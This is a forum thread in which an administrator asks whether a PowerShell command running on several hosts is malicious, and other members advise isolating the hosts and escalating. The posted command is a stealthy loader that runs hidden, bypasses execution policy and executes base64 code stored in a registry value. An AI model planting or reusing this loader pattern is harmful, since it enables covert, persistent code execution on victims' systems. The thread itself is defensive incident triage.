Powershell script running in our environment - Is it malicious???

Welcome Forums General PowerShell Q&A Powershell script running in our environment - Is it malicious???

This topic contains 3 replies, has 4 voices, and was last updated by

1 month, 3 weeks ago.

  • Author
  • #167803

    Topics: 1
    Replies: 0
    Points: 16
    Rank: Member

    Any Powershell experts I can use your help.

    I have this script below that is running on mulitple hosts, and wondering if you can tell me what it means or does?


    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -version 2 -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp "HKLM:\SOFTWARE\Microsoft\Powershell").ScriptInit)));


  • #167875

    Topics: 0
    Replies: 15
    Points: 61
    Helping Hand
    Rank: Member

    What is the value in ScriptInit registry key?
    Looks like, it is invoking a command which is encoded in ScriptInit key.

    Also did google and it is pointing to malicious.

  • #168151

    Topics: 2
    Replies: 999
    Points: 1,946
    Helping Hand
    Rank: Community Hero

    If you did not write and deploy it, and or no one you are aware of did so, or it was not part of some packaged you purchased, then the default security process is to fail close / disconnect it from the network / isolate the device / do not tamper it  of you ruin forensics / not trusted / kill it, period. Send it to your risk management / security team from review, as a simple text file, or bring the to the system that has it.

    If you don't know what a script is doing, then don't allow it to run.

    All audit modes should be leveraged.

  • #168181

    Topics: 0
    Replies: 44
    Points: 235
    Helping Hand
    Rank: Participant


    Do your system is managed by any of MSP software  like kaseya or  connectWise ?

You must be logged in to reply to this topic.